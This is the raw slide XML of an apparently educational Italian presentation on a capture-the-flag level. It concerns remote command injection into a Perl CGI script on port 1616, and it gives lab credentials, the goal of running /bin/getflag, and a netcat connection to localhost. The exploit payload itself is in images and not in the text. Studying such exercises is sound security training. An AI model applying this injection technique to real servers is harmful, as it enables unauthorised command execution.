          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249328" y="4038813"/>
            <a:ext cx="1641573" cy="436415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solid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it-IT">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>Contatto server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
              </a:rPr>
              <a:t> 1616</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Quicksand" panose="020B0604020202020204" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2250336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39" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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INIEZIONE REMOTA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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Immagine 3" descr="Immagine che contiene testo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD016D83-32F6-A162-7AF2-B8CCAC798FD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1123031" y="1249723"/>
            <a:ext cx="6887536" cy="3115110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="461912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39" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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INIEZIONE REMOTA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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Immagine 5" descr="Immagine che contiene testo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBB1B65E-95EF-BD1F-D04D-23CA65097E3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1256348" y="1119494"/>
            <a:ext cx="6620901" cy="3688524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3907355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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F917E6B-F26D-0207-1D64-19EB769D7E59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1234184" y="1119494"/>
            <a:ext cx="6665229" cy="3688524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1439" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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INIEZIONE REMOTA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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80440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39" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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Level 16</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1441" name="Google Shape;1441;p53"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010583" y="2433204"/>
            <a:ext cx="7313596" cy="621723"/>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sz="1400" dirty="0"/>
              <a:t>Lo script Perl in questione si chiama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>index.cgi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>e si trova al seguente percorso:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/home/flag16/index.cgi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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976;p108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE827554-4B0E-E24D-93EB-E98E9CD0BFE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="569238" y="1252219"/>
            <a:ext cx="7849561" cy="1075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0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Nirmala UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Nirmala UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“There is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Nirmala UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Nirmala UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Perl script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Nirmala UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Nirmala UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>running on port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Nirmala UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Nirmala UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1616</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Nirmala UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Nirmala UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Nirmala UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Nirmala UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>To do this level, log in as the level16 account with the password level16.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Nirmala UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Nirmala UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Files for this level can be found in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Nirmala UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Nirmala UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/home/flag16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Nirmala UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Nirmala UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{760D593E-E5CD-7C04-F8D6-E98063DD0A59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010583" y="3228110"/>
            <a:ext cx="7313596" cy="83127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0" indent="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400" dirty="0"/>
              <a:t>L’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>obiettivo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>della</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t>sfida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>è l’esecuzione del programma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t>/bin/getflag </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>con i privilegi dell’utente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t>flag16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34115800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41">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">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441">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1441">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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene testo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0887DE60-007B-0C3F-3A24-575DF5603A86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1263642" y="1119494"/>
            <a:ext cx="6606314" cy="3688525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1439" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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INIEZIONE REMOTA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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12323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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene testo&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0887DE60-007B-0C3F-3A24-575DF5603A86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1263642" y="1119494"/>
            <a:ext cx="6606314" cy="3688525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1439" name="Google Shape;1439;p53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1365850" y="447121"/>
            <a:ext cx="64122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CAPTURED THE FLAG</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1442" name="Google Shape;1442;p53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1443" name="Google Shape;1443;p53"/>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3"/>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3"/>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Immagine 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9463ECE7-D088-2451-5CCF-5AD081541D91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6485659" y="2398569"/>
            <a:ext cx="2182091" cy="2182091"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4161462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Google Shape;1840;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1260120" y="845540"/>
            <a:ext cx="1284600" cy="12846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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1234334" y="2352675"/>
            <a:ext cx="3995757" cy="194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9300">
                <a:solidFill>
                  <a:srgbClr val="00CFBE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DEBOLEZZE</a:t>
            </a:r>
            <a:endParaRPr sz="9300">
